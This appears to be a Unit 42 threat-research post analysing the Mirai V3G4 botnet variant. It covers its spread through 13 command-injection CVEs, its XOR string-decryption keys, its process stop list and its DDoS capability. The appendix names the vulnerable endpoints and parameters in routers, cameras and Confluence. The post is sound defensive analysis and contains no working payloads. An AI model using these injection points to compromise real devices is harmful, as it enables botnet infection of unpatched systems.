This post is also available in: 日本語 (Japanese)
We are providing a content warning because the following contains usage of a racial slur by a threat actor, which is not condoned in any instance by Unit 42. Unit 42 has partially redacted the racial slur to provide researchers with the ability to identify it and check IoCs as needed.
From July to December 2022, Unit 42 researchers observed a Mirai variant called V3G4, which was leveraging several vulnerabilities to spread itself. The vulnerabilities exploited include the following:
- CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
- Gitorious Remote Command Execution Vulnerability
- CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
- Mitel AWC Remote Command Execution Vulnerability
- CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
- CVE-2019-15107: Webmin Command Injection Vulnerability
- Spree Commerce Arbitrary Command Execution Vulnerability
- FLIR Thermal Camera Remote Command Execution Vulnerability
- CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
- CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
- CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
- CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
- CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet. The threat actor has the capability to utilize those devices to conduct further attacks, such as distributed denial-of-service (DDoS) attacks. The exploit attempts captured by Unit 42 researchers leverage the aforementioned vulnerabilities to spread V3G4, which targets exposed servers and networking devices running Linux.
Palo Alto Networks Next-Generation Firewall customers receive protections through cloud-delivered security services such as IoT Security, Advanced Threat Prevention, WildFire, and Advanced URL Filtering, which can help detect and block the exploit traffic and malware.
|Related Unit 42 Topics||Mirai, IoT|
V3G4 Malware Analysis
Botnet Client Execution-Related String Decryption
Brute Force Credential String Decryption
Indicators of Compromise
Since July 2022, Unit 42 researchers have observed three campaigns utilizing the Mirai V3G4 variant. Based on our analysis, we believe the campaigns were operated by the same threat actor for the following reasons:
- The hardcoded command and control (C2) domains among these three campaigns contain the same string (8xl9)
- The malware shell script downloaders are almost identical between the three campaigns
- The botnet client samples use the same XOR decryption key
- The botnet client samples use the same “stop list” (a list of target processes that the botnet client searches for and terminates)
- The botnet client samples use almost identical functions
The threat actor exploited 13 vulnerabilities that could lead to remote code execution. Upon successful exploitation, the wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients.
The utilized vulnerabilities are listed in Figure 1 below, and the detailed vulnerability information is listed in the Appendix section.
Based on behavior and patterns Unit 42 researchers observed during analysis of the downloaded botnet client samples, we believe that the botnet sample is a variant of the Mirai botnet.
Upon execution, the botnet client prints xXxSlicexXxxVEGA. to the console. The malware also contains a function that makes sure only one instance of this malware is executing on the infected device. If a botnet process already exists, the botnet client will simply print a string from the console and exit, as depicted in Figure 2.
The botnet client also contains a list of process names, and it tries to terminate those processes by checking the running process names on the infected host. The process names in that list belong to other botnet malware families and other Mirai variants. The full stop list is shown in Figure 3.
The V3G4 variant tries to connect to its hardcoded C2. This activity is shown in Figure 4.
Most Mirai variants use the same key for string encryption. However, this V3G4 variant uses different XOR encryption keys for different scenarios.
For strings related to botnet client execution, this V3G4 variant will first initialize an encrypted string table. It will then retrieve the encrypted string through an index (shown in Figures 5 and 6).
All the botnet client execution-related strings are decrypted with four rounds of XOR decryption (shown in Figure 7). The decryption keys used are the following:
- First round: 0xbc
- Second round: 0x69
- Third round: 0x3a
- Fourth round: 0xe6
V3G4 inherits its most significant feature from the original Mirai variant – a data section with embedded default login credentials for the scanner and brute force purposes. Like the original Mirai, it also encrypts all credentials with XOR key 0x37.
The V3G4 variant initializes the table of telnet/SSH login credentials in the scanner function. It then spreads itself through brute forcing network devices’ weak username/password combinations.
Before the botnet client establishes a connection with the C2 server, the malware will first initialize all DDoS attack functions (shown in Figure 9). Once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks.
We also noticed that the malware samples from the three campaigns we observed are slightly different. The original Mirai botnet sample spread itself by brute-forcing weak telnet/SSH credentials, whereas some Mirai variants utilize both brute-force and embedded exploits to spread themselves. However, samples from the September and December 2022 campaigns don’t contain the functions of vulnerability exploitation and brute force of credentials (this is shown in Figure 10).
The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution. Once the attacker gains control of a vulnerable device in this manner, they could take advantage by including the newly compromised devices in their botnet to conduct further attacks such as DDoS. Therefore, it is highly recommended that patches and updates are applied when possible.
Palo Alto Networks customers receive protection from the vulnerabilities and malware discussed above through the following products and services:
- Next-Generation Firewalls with a Threat Prevention security subscription can help block the attacks with Best Practices via Threat Prevention signatures 56254, 56954, 92632, 55935, 55933, 58668, 35131, 55798, 57897, 56256, 55934, 93332 and 93392.
- Advanced Threat Prevention has an inbuilt machine learning-based detection that can detect vulnerability exploits in real-time.
- WildFire can help stop the malware with static signature detections.
- Advanced URL Filtering and DNS Security are able to block the C2 domain and malware-hosting URLs.
- The Palo Alto Networks IoT Security platform can leverage network traffic information to identify the vendor, model and firmware version of a device and identify specific devices that are vulnerable to particular CVEs.
- In addition, IoT Security has inbuilt machine learning-based anomaly detection that can alert the customer if a device exhibits nontypical behavior such as a sudden appearance of traffic from a new source, an unusually high number of connections or an inexplicable surge of certain attributes typically appearing in IoT application payloads.
- New Mirai Variant Targeting Network Security Devices - Unit 42, Palo Alto Networks
- Mirai Variant MooBot Targeting D-Link Devices - Unit 42, Palo Alto Networks
- Network Security Trends: August-October 2022 - Unit 42, Palo Alto Networks
Campaign-related vulnerability information is listed below:
CVE-2012-4869: FreePBX Elastix Remote Command Execution Vulnerability
This malicious traffic was first detected as part of the V3G4 campaign on July 4, 2022. The exploit targets a command injection vulnerability in the FreePBX Elastix callme_startcall function, which does not successfully sanitize the user input in the callmenum parameter, leading to arbitrary command execution.
We captured this exploit traffic on July 4, 2022. The exploit works due to Gitorious’ insufficient input validation, which allows the attacker to exploit the vulnerability to launch a command injection.
CVE-2014-9727: FRITZ!Box Webcam Remote Command Execution Vulnerability
We observed this malicious traffic on July 4, 2022. This remote command execution vulnerability is due to a failure to sanitize the value of the var:lang parameter in the cgi-bin/webcm interface of the FRITZ!Box Webcam.
This exploit traffic was detected on July 4, 2022. The exploit targets a remote command execution vulnerability in the Mitel audio, web and video conferencing (AWC) product. The server fails to adequately sanitize the user-supplied input data, which leads to remote command execution.
CVE-2017-5173: Geutebruck IP Cameras Remote Command Execution Vulnerability
We detected this exploit traffic on July 4, 2022. The user input to Geutebruck IP Cameras’ testaction.cgi component is not correctly sanitized, allowing the attacker to run shell commands with root privilege.
CVE-2019-15107: Webmin Command Injection Vulnerability
This malicious traffic was detected on July 4, 2022. The exploit targets a command injection vulnerability in the password_change.cgi component within the Webmin product. The component does not successfully sanitize the parameters, which in turn can lead to arbitrary command execution.
We observed this exploit traffic on July 4, 2022. The exploit targets the Spree Commerce product’s insufficient input validation, the attacker can exploit the vulnerability to launch a remote command execution attack.
This exploit traffic was captured on July 4, 2022. The exploit works due to the FLIR Thermal Camera failing to sanitize user input, which in turn could lead to remote command execution.
CVE-2020-8515: DrayTek Vigor Remote Command Execution Vulnerability
We captured this exploit traffic on Sep. 13, 2022. The exploit targets the cgi-bin/mainfunction.cgi component of DrayTek Vigor. The component does not successfully sanitize the value of the HTTP parameter keyPath, which leads to remote command execution.
CVE-2020-15415: DrayTek Vigor Remote Command Injection Vulnerability
This malicious traffic was captured on Sep. 13, 2022. The exploit works due to the /cgi-bin/mainfunction.cgi/cvmcfgupload endpoint of DrayTek Vigor failing to sanitize the value of the HTTP parameter filename.
CVE-2022-36267: Airspan AirSpot Remote Command Execution Vulnerability
We detected this exploit traffic on Sep. 14, 2022. The exploit targets a remote command execution vulnerability in the Airspan AirSpot cgi-bin/diagnostics.cgi component. The component does not successfully sanitize the value of the HTTP parameter targetIP in the pingDiagnostic command.
CVE-2022-26134: Atlassian Confluence Remote Code Execution Vulnerability
This exploit traffic was captured on Sep. 12, 2022. An Object-Graph Navigation Language (OGNL) injection vulnerability exists in the Confluence Server and Data Center that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance.
CVE-2022-4257: C-Data Web Management System Command Injection Vulnerability
We observed this malicious traffic on Dec. 25, 2022. The exploit targets a remote code execution vulnerability in the diagnosis_config_save.php component of the C-Data Web management system. The component does not properly sanitize the values of the HTTP parameters iface and hostname, which in turn can lead to arbitrary command execution.